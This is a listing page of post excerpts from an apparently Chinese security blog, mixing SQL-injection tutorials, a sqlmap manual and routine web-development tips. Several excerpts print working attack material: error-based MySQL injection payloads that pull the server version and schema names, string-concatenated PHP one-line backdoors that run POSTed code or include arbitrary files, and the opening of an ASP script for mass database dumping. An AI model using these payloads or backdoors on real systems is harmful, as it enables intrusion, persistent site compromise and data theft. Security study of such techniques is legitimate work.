SQL Injections in MySQL LIMIT clause

SQL Injections in MySQL LIMIT clause
此方法适用于MySQL 5.x中,在limit语句后面的注入 例如: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法: SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESU...
2016年03月12日 汪洋大海 暂无评论 喜欢 0 阅读 3,603 views 次 阅读全文

MYSQL高级报错注入脚本安全

MYSQL高级报错注入脚本安全
 MYSQL高级报错注入     and (select count(*) from mysql.user)>0/*     1、查看MYSQL版本     and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)     2、爆所有库     and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM infor...
2016年03月07日 汪洋大海 暂无评论 喜欢 0 阅读 3,561 views 次 阅读全文

深入了解SQL注入绕过waf和过滤机制

深入了解SQL注入绕过waf和过滤机制
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言 笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪。之前对WAF接触比较少纯粹是新手趁此科普了 一下并查阅了一些绕过W...
2016年03月07日 汪洋大海 暂无评论 喜欢 0 阅读 2,931 views 次 阅读全文

msql脱裤脚本千万级别无问题

msql脱裤脚本千万级别无问题
[【ASP】] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 <%Server.ScriptTimeOut=12000%> <style type="text/css"> &...
2016年02月24日 汪洋大海 暂无评论 喜欢 0 阅读 3,743 views 次 阅读全文

强悍的PHP一句话后门

强悍的PHP一句话后门
1、 $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 2、 $filename=$_GET['xbid']; include ($filename); //危险的include函数,直接编译任何文件为php格式运行 3、 $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); //重命名任何文件 4、 $gzid = "p"."r"."e...
2016年02月23日 汪洋大海 暂无评论 喜欢 0 阅读 3,889 views 次 阅读全文

Kali解决不全屏、不能拖拽、复制的毛病之安装vm. 主机虚拟机之间的复制粘贴

Kali解决不全屏、不能拖拽、复制的毛病之安装vm. 主机虚拟机之间的复制粘贴
估计看着标题会有人会吐槽,你会就别说了!嘿嘿,下面开始:   本篇文章无需观看了,请移步至这里:虚拟机kali linux    https://woj.app/980.html   -------------------------------------------------------------------------------------------------   0x1: 首先打开虚拟机上的Kali,然后在虚拟状态栏(最上面那一排)---->虚拟机------>安装vmw...
2016年02月19日 汪洋大海 暂无评论 喜欢 1 阅读 22,620 views 次 阅读全文

sqlmap用户手册

sqlmap用户手册
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 if(now()=sysdate(),sleep(3),2) 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是...
2016年02月19日 汪洋大海 暂无评论 喜欢 0 阅读 3,125 views 次 阅读全文

dedecms5.7整合百度编辑器UEditor1.4.3版本插件

dedecms5.7整合百度编辑器UEditor1.4.3版本插件
首先下载对应的版本百度编辑器,我用的GBK版本的。 http://pan.baidu.com/s/1eQXik9s 然后找到网站目录中的如下文件: /include/inc/inc_fun_funAdmin.php 在其中添加如下代码,总共两个,愿意用哪个就用哪个,本人用第一个,第二个注释了。如果你用的是UTF-8就把下面的改为UTF-8呦。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 3...
2016年02月18日 汪洋大海 暂无评论 喜欢 1 阅读 3,048 views 次 阅读全文

js表单点击提交按钮后变成灰色(防止表单重复提交实现代码)

js表单点击提交按钮后变成灰色(防止表单重复提交实现代码)
表单点击提交按钮后变成灰色这种做法就是为了防止用户重复提交数据防,我们利用了form的一个属性disabled禁止按钮使用,代码如下: <input type="button" value="提交" onclick="javascript:{this.disabled=true;document.form1.submit();}"> 例子代码如下: <form name="form1" method="POST" action="http://www.xiariboke.com" target="_blank"> <in...
2016年02月17日 汪洋大海 暂无评论 喜欢 0 阅读 4,694 views 次 阅读全文

mysql随机更新50条数据 语句

mysql随机更新50条数据 语句
UPDATE `abc`.`products` SET `products_status` = '1' WHERE `products_status`=0  ORDER BY RAND() LIMIT 50   复杂的版本: UPDATE `abc`.`products` SET `products_status` = '1' WHERE `products`.`products_id` in (select t.products_id from (select * from products where `products_status`=0  ORDER BY RAND() LIMIT 50)as t)
2016年02月16日 汪洋大海 暂无评论 喜欢 0 阅读 2,892 views 次 阅读全文